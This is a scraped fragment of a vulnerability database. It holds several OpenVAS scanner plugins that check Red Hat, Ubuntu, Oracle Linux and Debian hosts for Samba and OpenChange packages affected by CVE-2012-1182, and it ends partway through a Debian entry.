"type": "openvas", "title": "RedHat Update for samba4 RHSA-2013:0506-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-01-23T00:00:00", "id": "OPENVAS:870935", "href": "http://plugins.openvas.org/nasl.php?oid=870935", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba4 RHSA-2013:0506-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler, used to generate code to handle RPC calls. This could result in\n code generated by the PIDL compiler to not sufficiently protect against\n buffer overflows. (CVE-2012-1182)\n\n The samba4 packages have been upgraded to upstream version 4.0.0, which\n provides a number of bug fixes and enhancements over the previous version.\n In particular, improved interoperability with Active Directory (AD)\n domains. SSSD now uses the libndr-krb5pac library to parse the Privilege\n Attribute Certificate (PAC) issued by an AD Key Distribution Center (KDC).\n\n The Cross Realm Kerberos Trust functionality provided by Identity\n Management, which relies on the capabilities of the samba4 client library,\n is included as a Technology Preview. This functionality and server\n libraries, is included as a Technology Preview. This functionality uses the\n libndr-nbt library to prepare Connection-less Lightweight Directory Access\n Protocol (CLDAP) messages.\n\n Additionally, various improvements have been made to the Local Security\n Authority (LSA) and Net Logon services to allow verification of trust\n from a Windows system. Because the Cross Realm Kerberos Trust functionality\n is considered a Technology Preview, selected samba4 components are\n considered to be a Technology Preview. For more information on which Samba\n packages are considered a Technology Preview, refer to Table 5.1, Samba4\n Package Support in the Release Notes, linked to from the References.\n (BZ#766333, BZ#882188)\n\n This update also fixes the following bug:\n\n * Prior to this update, if the Active Directory (AD) server was rebooted,\n Winbind sometimes failed to reconnect when requested by wbinfo -n or\n wbinfo -s commands. Consequently, looking up users using the wbinfo tool\n failed. This update applies upstream patches to fix this problem and now\n looking up a Security Identifier (SID) for a username, or a username for a\n given SID, works as expected after a domain controller is rebooted.\n (BZ#878564)\n\n All users of samba4 are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\n\n Warning: If you upgrade from Red Hat Enterprise Linux 6.3 to Red Hat\n Enterprise Linux 6.4 and you have Samba in use, you should make sure that\n you uninstall the package named samba4 to avoid conflicts during the\n upgrade.\";\n\n\ntag_affected = \"samba4 on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00049.html\");\n script_id(870935);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:23 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0506-02\");\n script_name(\"RedHat Update for samba4 RHSA-2013:0506-02\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba4\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba4\", rpm:\"samba4~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-client\", rpm:\"samba4-client~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-common\", rpm:\"samba4-common~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc\", rpm:\"samba4-dc~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-dc-libs\", rpm:\"samba4-dc-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-debuginfo\", rpm:\"samba4-debuginfo~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-devel\", rpm:\"samba4-devel~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-libs\", rpm:\"samba4-libs~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-pidl\", rpm:\"samba4-pidl~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-python\", rpm:\"samba4-python~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-swat\", rpm:\"samba4-swat~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-test\", rpm:\"samba4-test~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind\", rpm:\"samba4-winbind~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-clients\", rpm:\"samba4-winbind-clients~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba4-winbind-krb5-locator\", rpm:\"samba4-winbind-krb5-locator~4.0.0~55.el6.rc4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:17", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-02-22T00:00:00", "type": "openvas", "title": "RedHat Update for openchange RHSA-2013:0515-02", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-11-23T00:00:00", "id": "OPENVAS:1361412562310870928", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310870928", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for openchange RHSA-2013:0515-02\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00055.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.870928\");\n script_version(\"$Revision: 12497 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-11-23 09:28:21 +0100 (Fri, 23 Nov 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-02-22 10:02:03 +0530 (Fri, 22 Feb 2013)\");\n script_cve_id(\"CVE-2012-1182\");\n script_bugtraq_id(52973);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"RHSA\", value:\"2013:0515-02\");\n script_name(\"RedHat Update for openchange RHSA-2013:0515-02\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'openchange'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\", re:\"ssh/login/release=RHENT_6\");\n script_tag(name:\"affected\", value:\"openchange on Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"The openchange packages provide libraries to access Microsoft Exchange\n servers using native protocols. Evolution-MAPI uses these libraries to\n integrate the Evolution PIM application with Microsoft Exchange servers.\n\n A flaw was found in the Samba suite's Perl-based DCE/RPC IDL (PIDL)\n compiler. As OpenChange uses code generated by PIDL, this could have\n resulted in buffer overflows in the way OpenChange handles RPC calls. With\n this update, the code has been generated with an updated version of PIDL to\n correct this issue. (CVE-2012-1182)\n\n The openchange packages have been upgraded to upstream version 1.0, which\n provides a number of bug fixes and enhancements over the previous version,\n including support for the rebased samba4 packages and several API changes.\n (BZ#767672, BZ#767678)\n\n This update also fixes the following bugs:\n\n * When the user tried to modify a meeting with one required attendee and\n himself as the organizer, a segmentation fault occurred in the memcpy()\n function. Consequently, the evolution-data-server application terminated\n unexpectedly with a segmentation fault. This bug has been fixed and\n evolution-data-server no longer crashes in the described scenario.\n (BZ#680061)\n\n * Prior to this update, OpenChange 1.0 was unable to send messages with\n a large message body or with extensive attachment. This was caused by minor\n issues in OpenChange's exchange.idl definitions. This bug has been fixed\n and OpenChange now sends extensive messages without complications.\n (BZ#870405)\n\n All users of openchange are advised to upgrade to these updated packages,\n which fix these issues and add these enhancements.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"evolution-mapi-debuginfo\", rpm:\"evolution-mapi-debuginfo~0.28.3~12.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"openchange-debuginfo\", rpm:\"openchange-debuginfo~1.0~4.el6\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:20:38", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1423-1", "cvss3": {}, "published": "2012-04-13T00:00:00", "type": "openvas", "title": "Ubuntu Update for samba USN-1423-1", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-01T00:00:00", "id": "OPENVAS:840980", "href": "http://plugins.openvas.org/nasl.php?oid=840980", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1423_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for samba USN-1423-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Brian Gorenc discovered that Samba incorrectly calculated array bounds when\n handling remote procedure calls (RPC) over the network. A remote,\n unauthenticated attacker could exploit this to execute arbitrary code as the\n root user. (CVE-2012-1182)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1423-1\";\ntag_affected = \"samba on Ubuntu 11.10 ,\n Ubuntu 11.04 ,\n Ubuntu 10.04 LTS ,\n Ubuntu 8.04 LTS\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1423-1/\");\n script_id(840980);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-13 10:33:26 +0530 (Fri, 13 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1423-1\");\n script_name(\"Ubuntu Update for samba USN-1423-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.4.7~dfsg-1ubuntu3.9\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.11~dfsg-1ubuntu2.2\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"2:3.5.8~dfsg-1ubuntu2.4\", rls:\"UBUNTU11.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"samba\", ver:\"3.0.28a-1ubuntu4.18\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:58:08", "description": "Check for the Version of samba3x", "cvss3": {}, "published": "2012-04-11T00:00:00", "type": "openvas", "title": "RedHat Update for samba3x RHSA-2012:0466-01", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2017-12-27T00:00:00", "id": "OPENVAS:870584", "href": "http://plugins.openvas.org/nasl.php?oid=870584", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for samba3x RHSA-2012:0466-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Samba is an open-source implementation of the Server Message Block (SMB) or\n Common Internet File System (CIFS) protocol, which allows PC-compatible\n machines to share files, printers, and other information.\n\n A flaw in the Samba suite's Perl-based DCE/RPC IDL (PIDL) compiler, used\n to generate code to handle RPC calls, resulted in multiple buffer overflows\n in Samba. A remote, unauthenticated attacker could send a specially-crafted\n RPC request that would cause the Samba daemon (smbd) to crash or, possibly,\n execute arbitrary code with the privileges of the root user.\n (CVE-2012-1182)\n\n Users of Samba are advised to upgrade to these updated packages, which\n contain a backported patch to resolve this issue. After installing this\n update, the smb service will be restarted automatically.\";\n\ntag_affected = \"samba3x on Red Hat Enterprise Linux (v. 5 server)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2012-April/msg00003.html\");\n script_id(870584);\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 8249 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-27 07:29:56 +0100 (Wed, 27 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-11 10:59:47 +0530 (Wed, 11 Apr 2012)\");\n script_cve_id(\"CVE-2012-1182\");\n script_xref(name: \"RHSA\", value: \"2012:0466-01\");\n script_name(\"RedHat Update for samba3x RHSA-2012:0466-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of samba3x\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"samba3x\", rpm:\"samba3x~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-client\", rpm:\"samba3x-client~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-common\", rpm:\"samba3x-common~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-debuginfo\", rpm:\"samba3x-debuginfo~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-doc\", rpm:\"samba3x-doc~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-domainjoin-gui\", rpm:\"samba3x-domainjoin-gui~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-swat\", rpm:\"samba3x-swat~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind\", rpm:\"samba3x-winbind~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"samba3x-winbind-devel\", rpm:\"samba3x-winbind-devel~3.5.10~0.108.el5_8\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:36:48", "description": "Oracle Linux Local Security Checks ELSA-2013-0515", "cvss3": {}, "published": "2015-10-06T00:00:00", "type": "openvas", "title": "Oracle Linux Local Check: ELSA-2013-0515", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310123690", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310123690", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2013-0515.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.123690\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:07:16 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2013-0515\");\n script_tag(name:\"insight\", value:\"ELSA-2013-0515 - openchange security, bug fix and enhancement update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2013-0515\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2013-0515.html\");\n script_cve_id(\"CVE-2012-1182\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux6\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux6\")\n{\n if ((res = isrpmvuln(pkg:\"evolution-mapi\", rpm:\"evolution-mapi~0.28.3~12.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"evolution-mapi-devel\", rpm:\"evolution-mapi-devel~0.28.3~12.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange\", rpm:\"openchange~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-client\", rpm:\"openchange-client~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-devel\", rpm:\"openchange-devel~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"openchange-devel-docs\", rpm:\"openchange-devel-docs~1.0~4.el6\", rls:\"OracleLinux6\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:15", "description": "The remote host is missing an update to samba\nannounced via advisory DSA 2450-1.", "cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2450-1 (samba)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-1182"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071254", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071254", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2450_1.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2450-1 (samba)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71254\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cve_id(\"CVE-2012-1182\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 